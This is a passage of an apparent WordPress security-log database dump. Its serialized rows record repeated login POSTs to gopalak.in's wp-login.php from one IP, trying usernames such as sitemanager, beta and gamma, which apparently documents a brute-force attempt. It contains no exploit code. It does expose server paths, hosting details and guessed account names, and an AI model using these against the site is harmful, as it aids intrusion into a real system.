_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984089.0790761;s:12:\"REQUEST_TIME\";i:1746984089;}}','13.233.245.36',1,'2025-05-11 22:51:31','2025-05-12 23:29:05'),(95553,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984089.0782411;s:12:\"REQUEST_TIME\";i:1746984089;}}','13.233.245.36',1,'2025-05-11 22:51:31','2025-05-12 23:29:05'),(95554,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984090.9866419;s:12:\"REQUEST_TIME\";i:1746984090;}}','13.233.245.36',1,'2025-05-11 22:51:32','2025-05-12 23:29:05'),(95555,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984090.985889;s:12:\"REQUEST_TIME\";i:1746984090;}}','13.233.245.36',1,'2025-05-11 22:51:32','2025-05-12 23:29:05'),(95556,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984450.606355;s:12:\"REQUEST_TIME\";i:1746984450;}}','13.233.245.36',1,'2025-05-11 22:57:32','2025-05-12 23:29:05'),(95557,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984450.6133261;s:12:\"REQUEST_TIME\";i:1746984450;}}','13.233.245.36',1,'2025-05-11 22:57:32','2025-05-12 23:29:05'),(95558,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984450.6150091;s:12:\"REQUEST_TIME\";i:1746984450;}}','13.233.245.36',1,'2025-05-11 22:57:32','2025-05-12 23:29:05'),(95559,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984450.6141911;s:12:\"REQUEST_TIME\";i:1746984450;}}','13.233.245.36',1,'2025-05-11 22:57:32','2025-05-12 23:29:05'),(95560,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984452.346267;s:12:\"REQUEST_TIME\";i:1746984452;}}','13.233.245.36',1,'2025-05-11 22:57:34','2025-05-12 23:29:05'),(95561,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984812.4959359;s:12:\"REQUEST_TIME\";i:1746984812;}}','13.233.245.36',1,'2025-05-11 23:03:34','2025-05-12 23:29:05'),(95562,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746984812.520993;s:12:\"REQUEST_TIME\";i:1746984812;}}','13.233.245.36',1,'2025-05-11 23:03:34','2025-05-12 23:29:05'),(95563,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.233.245.36\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.233.245.36\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.233.245.36\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"C